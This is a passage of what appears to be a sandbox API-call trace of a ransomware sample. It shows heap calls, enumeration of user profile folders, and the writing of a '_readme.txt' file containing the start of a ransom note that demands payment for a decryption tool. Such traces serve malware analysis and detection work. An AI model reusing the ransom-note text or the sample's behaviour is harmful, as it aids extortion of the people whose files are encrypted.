nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0174.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0174.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0174.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0174.155] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x13, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x629b4b20, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x629b4b20, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="Default", cAlternateFileName="")) returned 1 [0174.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0174.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84cc0 [0174.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0174.156] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Default User", cAlternateFileName="DEFAUL~1")) returned 1 [0174.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0174.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84cf8 [0174.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0174.157] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x286e4016, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x286e4016, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28a4ffbc, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0174.157] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 1 [0174.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0174.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0174.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0174.158] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ab8 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c18 [0174.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ab8 | out: hHeap=0x6a0000) returned 1 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x498) returned 0x2d301d0 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ab8 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d277e8 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d278d8 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27cc0 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c98 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c70 [0174.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c48 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27c20 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bf8 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27bd0 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279a0 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27950 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a40 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a68 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27a90 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ef0 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f18 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f40 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f68 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27f90 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fb8 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27fe0 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d28008 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84da8 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84de0 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84e18 [0174.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84e50 [0174.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0174.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b30 | out: hHeap=0x6a0000) returned 1 [0174.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b08 | out: hHeap=0x6a0000) returned 1 [0174.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ae0 | out: hHeap=0x6a0000) returned 1 [0174.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27978 | out: hHeap=0x6a0000) returned 1 [0174.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27928 | out: hHeap=0x6a0000) returned 1 [0174.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279f0 | out: hHeap=0x6a0000) returned 1 [0174.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27d10 | out: hHeap=0x6a0000) returned 1 [0174.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27d38 | out: hHeap=0x6a0000) returned 1 [0174.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27d60 | out: hHeap=0x6a0000) returned 1 [0174.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27d88 | out: hHeap=0x6a0000) returned 1 [0174.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27db0 | out: hHeap=0x6a0000) returned 1 [0174.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27dd8 | out: hHeap=0x6a0000) returned 1 [0174.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27e00 | out: hHeap=0x6a0000) returned 1 [0174.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27e28 | out: hHeap=0x6a0000) returned 1 [0174.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27e50 | out: hHeap=0x6a0000) returned 1 [0174.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27e78 | out: hHeap=0x6a0000) returned 1 [0174.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ea0 | out: hHeap=0x6a0000) returned 1 [0174.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ec8 | out: hHeap=0x6a0000) returned 1 [0174.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b80 | out: hHeap=0x6a0000) returned 1 [0174.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ba8 | out: hHeap=0x6a0000) returned 1 [0174.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27a18 | out: hHeap=0x6a0000) returned 1 [0174.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27900 | out: hHeap=0x6a0000) returned 1 [0174.169] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0174.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0174.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cf8 | out: hHeap=0x6a0000) returned 1 [0174.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0174.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2feb8 | out: hHeap=0x6a0000) returned 1 [0174.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0174.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0174.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c18 | out: hHeap=0x6a0000) returned 1 [0174.172] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0174.173] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0174.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27838 | out: hHeap=0x6a0000) returned 1 [0174.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27838 [0174.173] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.173] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.174] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.174] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.175] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.175] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.176] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.176] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.177] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.178] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.180] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.181] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.183] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.183] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.184] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d2ec90 [0174.210] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.211] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d279c8 [0174.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.214] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d279c8 | out: hHeap=0x6a0000) returned 1 [0174.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27838 | out: hHeap=0x6a0000) returned 1 [0174.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0174.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27770 | out: hHeap=0x6a0000) returned 1 [0174.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f360 | out: hHeap=0x6a0000) returned 1 [0174.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27810 | out: hHeap=0x6a0000) returned 1 [0174.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27860 | out: hHeap=0x6a0000) returned 1 [0174.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84ba8 | out: hHeap=0x6a0000) returned 1 [0174.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0174.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27888 | out: hHeap=0x6a0000) returned 1 [0174.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f288 | out: hHeap=0x6a0000) returned 1 [0174.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.218] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d276f8 | out: hHeap=0x6a0000) returned 1 [0174.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c40050 | out: hHeap=0x6a0000) returned 1 [0174.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d276f8 [0174.219] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0174.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.219] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.221] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.222] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d165c0 [0174.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.223] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d165c0 [0174.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27680 [0174.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d165c0 [0174.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0174.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d165c0 | out: hHeap=0x6a0000) returned 1 [0174.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.226] PathFindFileNameW (pszPath="C:\\Boot\\cs-CZ\\") returned="cs-CZ\\" [0174.226] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0174.226] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d277c0 | out: hHeap=0x6a0000) returned 1 [0174.226] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0174.226] PathFindFileNameW (pszPath="") returned="" [0174.226] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0174.227] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0174.227] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2d2ec90 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0174.227] FreeLibrary (hLibModule=0x759d0000) returned 1 [0174.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27680 | out: hHeap=0x6a0000) returned 1 [0174.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0174.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.227] PathAppendW (in: pszPath="C:\\Boot\\cs-CZ\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 1 [0174.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0174.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d278b0 | out: hHeap=0x6a0000) returned 1 [0174.227] PathFileExistsW (pszPath="C:\\Boot\\cs-CZ\\_readme.txt") returned 0 [0174.229] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d00) returned 0x2d30670 [0174.229] lstrcpyW (in: lpString1=0x2d30670, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC 